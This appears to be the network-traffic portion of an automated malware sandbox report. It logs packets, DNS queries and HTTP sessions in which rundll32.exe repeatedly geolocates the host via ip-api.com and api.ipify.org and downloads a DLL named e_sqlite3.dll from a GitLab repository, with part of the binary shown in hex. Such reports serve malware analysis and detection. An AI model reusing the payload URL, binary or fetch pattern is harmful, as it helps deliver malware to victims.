                                                                                                                                                                                              Jan 14, 2025 13:14:35.833810091 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.842061043 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:35.846898079 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.846985102 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:35.847096920 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:35.851912975 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.326311111 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.326610088 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:36.330605030 CET50072443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.330663919 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.330765963 CET50072443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.331037045 CET50072443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.331052065 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.331640005 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.331707001 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:36.804757118 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.805417061 CET50072443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.805444956 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.805954933 CET50072443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.805958986 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.956811905 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.956887007 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.956948042 CET50072443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.957331896 CET50072443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.957350969 CET44350072172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.958482981 CET50073443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.958540916 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:36.958619118 CET50073443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.958823919 CET50073443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:36.958838940 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.412861109 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.413506985 CET50073443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:37.413542032 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.414092064 CET50073443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:37.414098978 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.563268900 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.563343048 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.563400030 CET50073443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:37.563739061 CET50073443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:37.563769102 CET44350073172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.564961910 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:37.569833040 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:37.569940090 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:37.570071936 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:37.574861050 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:38.025420904 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:38.025849104 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:38.031035900 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:38.031105995 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 14, 2025 13:13:36.991197109 CET6001753192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 14, 2025 13:13:36.998433113 CET53600171.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.612518072 CET6233653192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 14, 2025 13:13:39.619326115 CET53623361.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.899626970 CET6517753192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 14, 2025 13:13:40.907867908 CET53651771.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.834657907 CET6522253192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 14, 2025 13:14:35.841337919 CET53652221.1.1.1192.168.2.4
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 14, 2025 13:13:36.991197109 CET192.168.2.41.1.1.10x1cf7Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:13:39.612518072 CET192.168.2.41.1.1.10xe000Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:13:40.899626970 CET192.168.2.41.1.1.10x20a8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:14:35.834657907 CET192.168.2.41.1.1.10x6f19Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 14, 2025 13:13:36.998433113 CET1.1.1.1192.168.2.40x1cf7No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:13:39.619326115 CET1.1.1.1192.168.2.40xe000No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:13:39.619326115 CET1.1.1.1192.168.2.40xe000No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:13:39.619326115 CET1.1.1.1192.168.2.40xe000No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:13:40.907867908 CET1.1.1.1192.168.2.40x20a8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 14, 2025 13:14:35.841337919 CET1.1.1.1192.168.2.40x6f19No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              • gitlab.com
                                                                                                                                                                                              • api.ipify.org
                                                                                                                                                                                              • ip-api.com
                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449974208.95.112.1807824C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 14, 2025 13:13:40.913767099 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                              Jan 14, 2025 13:13:41.387130022 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:13:41 GMT
                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                              Content-Length: 306
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              X-Ttl: 33
                                                                                                                                                                                              X-Rl: 42
                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449989208.95.112.1807824C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 14, 2025 13:13:42.662889957 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                              Jan 14, 2025 13:13:43.137644053 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:13:42 GMT
                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                              Content-Length: 306
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              X-Ttl: 32
                                                                                                                                                                                              X-Rl: 41
                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.450071208.95.112.1805812C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 14, 2025 13:14:35.847096920 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                              Jan 14, 2025 13:14:36.326311111 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:14:36 GMT
                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                              Content-Length: 306
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              X-Ttl: 60
                                                                                                                                                                                              X-Rl: 44
                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.450074208.95.112.1805812C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 14, 2025 13:14:37.570071936 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                              Jan 14, 2025 13:14:38.025420904 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:14:37 GMT
                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                              Content-Length: 306
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              X-Ttl: 58
                                                                                                                                                                                              X-Rl: 43
                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449948172.65.251.784437824C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:13:37 UTC127OUTGET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1
                                                                                                                                                                                              Host: gitlab.com
                                                                                                                                                                                              2025-01-14 12:13:37 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:13:37 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 1780736
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              CF-Ray: 901d8a861e818c95-EWR
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Age: 26
                                                                                                                                                                                              Cache-Control: max-age=3600, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                              Content-Disposition: attachment; filename="e_sqlite3.dll"; filename*=UTF-8''e_sqlite3.dll
                                                                                                                                                                                              ETag: "fc529fb92be2696af6fda5021785be60"
                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                              2025-01-14 12:13:37 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                              Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                              2025-01-14 12:13:37 UTC500INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 54 4c 6e 70 38 54 37 35 4f 79 6b 6f 78 36 48 4f 76 71 46 71 47 65 5a 57 31 75 67 41 31 62 43 4d 55 6d 34 6b 75 6a 57 49 61 50 4f 4b 42 36 38 43 67 45 79 61 48 73 34 42 49 25 32 46 64 6b 56 51 74 72 31 4a 7a 6a 6b 6b 51 4f 35 75 62 25 32 42 69 72 57 4a 70 36 71 77 38 76 53 4a 34 68 49 76 4f 77 44 70 59 73 37 64 31 25 32 42 4d 55 50 44 56 75 66 6d 51 47 68 4c 41 78 50 4e 54 72 50 53 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TLnp8T75Oykox6HOvqFqGeZW1ugA1bCMUm4kujWIaPOKB68CgEyaHs4BI%2FdkVQtr1JzjkkQO5ub%2BirWJp6qw8vSJ4hIvOwDpYs7d1%2BMUPDVufmQGhLAxPNTrPS4%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e b6 df 42 0a d7 b1 11 0a d7 b1 11 0a d7 b1 11 41 af b2 10 1e d7 b1 11 41 af b4 10 99 d7 b1 11 41 af b5 10 2b d7 b1 11 41 af b0 10 09 d7 b1 11 0a d7 b0 11 83 d7 b1 11 58 a2 b4 10 2a d7 b1 11 58 a2 b5 10 04 d7 b1 11 58 a2 b2 10 00 d7 b1 11 c7 a2 b5 10 08 d7 b1 11 c7 a2 b1 10 0b d7 b1 11 c7 a2 4e 11 0b d7 b1 11 c7 a2 b3 10 0b d7 b1 11 52 69 63 68 0a d7 b1 11 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NBAAA+AX*XXNRich
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: 00 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 80 79 0a 00 48 8b d9 74 0d c6 41 0a 00 48 8b 49 38 e8 04 9f 01 00 48 8b cb e8 0c f8 0a 00 48 8b cb 48 83 c4 20 5b e9 6f 03 0b 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 56 48 83 ec 20 0f b6 41 09 45 33 c0 4c 8b f2 48 8b d9 84 c0 74 06 48 8d 79 40 eb 0f 44 39 41 24 74 06 48 8b 79 30 eb 03 49 8b f8 be 0c 00 00 00 48 8b c8 48 2b f0 4c 39 04 f3 4c 8d 0c f3 75 26 b8 01 00 00 00 3b c1 74 0a 48 8b 43 30 48 8b 50 08 eb 04 48 8b 53 48 48 8b 0b e8 d1 d7 09 00 44 8b c0 85 c0 75 44 48 85 ff 74 3c 48 8b 04 f3 44 0f b6 4f 12 48 8b 50 18 0f b6 4a 02 0f b6 42 03 c1 e1 08 03 c8 44 3b c9 72 07 b8 04 00 00 00 eb 19 48 8b 03 0f b6 48 27
                                                                                                                                                                                              Data Ascii: 3H [@SH yHtAHI8HHH [oH\$Ht$H|$AVH AE3LHtHy@D9A$tHy0IHH+L9Lu&;tHC0HPHSHHDuDHt<HDOHPJBD;rHH'
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: 24 58 33 d2 48 8b e8 4c 89 70 08 c6 40 11 01 4c 8b 4e 18 45 0f b6 51 02 41 0f b6 49 03 41 c1 e2 08 44 03 d1 74 22 45 0f b6 5d 27 45 33 c0 49 63 c0 4a 8b 4c 08 04 48 0f c9 48 3b cf 74 18 ff c2 45 03 c3 41 3b d2 7c e6 bb 0b 01 00 00 44 88 7d 12 e9 df 04 00 00 44 8b fa 33 db 44 88 7d 12 e9 d1 04 00 00 45 33 c0 4c 8d 8c 24 a0 00 00 00 49 8b cd 41 8d 50 01 e8 c3 d2 09 00 8b d8 85 c0 75 4d 0f 57 f6 85 ff 0f 8e 49 04 00 00 48 89 7c 24 20 e8 58 a1 12 00 85 c0 74 0c 49 89 6c 24 18 41 89 7c 24 10 eb 23 48 8d 1c 7f 48 c1 e3 03 48 8b cb e8 58 08 0f 00 49 89 44 24 18 41 89 7c 24 10 48 85 c0 0f 85 d0 00 00 00 bb 07 00 00 00 48 8b bc 24 a0 00 00 00 48 85 ff 0f 84 56 04 00 00 83 6f 10 01 0f 85 4c 04 00 00 41 ff 4d 5c 48 83 7f 08 01 75 08 41 c7 45 2c ff ff ff ff 48 8b 17
                                                                                                                                                                                              Data Ascii: $X3HLp@LNEQAIADt"E]'E3IcJLHH;tEA;|D}D3D}E3L$IAPuMWIH|$ XtIl$A|$#HHHXID$A|$HH$HVoLAM\HuAE,H
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: c4 60 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc cc cc cc cc 48 89 5c 24 20 48 89 54 24 10 56 57 41 54 41 55 41 57 48 83 ec 20 8b 59 14 4d 8b e1 44 8b 51 10 4d 8b e8 48 8b 71 08 48 8b f9 41 3b da 0f 8d 7f 00 00 00 8b c3 4c 8d 05 d4 3e 16 00 0f 1f 40 00 8b d3 8b d8 48 63 c2 48 0f be 0c 30 84 c9 78 1c 83 f9 30 7c 08 42 80 7c 01 d0 00 75 0f 8d 5a 01 89 5f 14 8b d3 8b c3 41 3b da 7c d6 4c 63 fb 41 3b da 7d 32 8b d3 66 66 0f 1f 84 00 00 00 00 00 48 63 c2 48 0f be 0c 30 84 c9 78 0d 83 f9 30 7c 15 42 80 7c 01 d0 00 74 0d 8d 5a 01 89 5f 14 8b d3 41 3b da 7c da 8b c3 41 3b df 7f 1c 41 3b da 7c 8e b8 65 00 00 00 48 8b 5c 24 68 48 83 c4 20 41 5f 41 5d 41 5c 5f 5e c3 41 2b df 48 89 6c 24 50 4c 89 74 24 60 3b 5f 28 7e 27 4c 8b 77 20 8d 6b 14 89 6f 28 e8 96 9b 12 00
                                                                                                                                                                                              Data Ascii: `A_A^A]A\_^]H\$ HT$VWATAUAWH YMDQMHqHA;L>@HcH0x0|B|uZ_A;|LcA;}2ffHcH0x0|B|tZ_A;|A;A;|eH\$hH A_A]A\_^A+Hl$PLt$`;_(~'Lw ko(
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: f8 19 76 0c 48 8d 42 9f 48 83 f8 19 8b c1 77 05 b8 01 00 00 00 85 c0 0f 95 c0 fe c8 41 88 44 11 08 48 ff c2 48 81 fa 80 00 00 00 7c c3 4c 89 0e 33 c0 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 8b 5c 24 30 b8 07 00 00 00 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc 48 89 5c 24 18 48 89 74 24 20 48 89 54 24 10 57 41 54 41 55 41 56 41 57 48 83 ec 20 8b 59 14 4d 8b e1 44 8b 51 10 4d 8b e8 4c 8b 19 48 8b f2 4c 8b 71 08 48 8b f9 41 3b da 7d 73 8b c3 0f 1f 00 8b d3 8b d8 0f 1f 40 00 0f 1f 84 00 00 00 00 00 48 63 c2 42 0f b6 0c 30 80 f9 80 73 15 42 80 7c 19 08 00 74 0d 8d 5a 01 89 5f 14 8b d3 41 3b da 7c de 4c 63 fb 41 3b da 7d 28 8b d3 0f 1f 40 00 48 63 c2 42 0f b6 0c 30 80 f9 80 73 08 42 80 7c 19 08 00 75 0d 8d 5a 01 89 5f 14 8b d3 41 3b da 7c de 8b
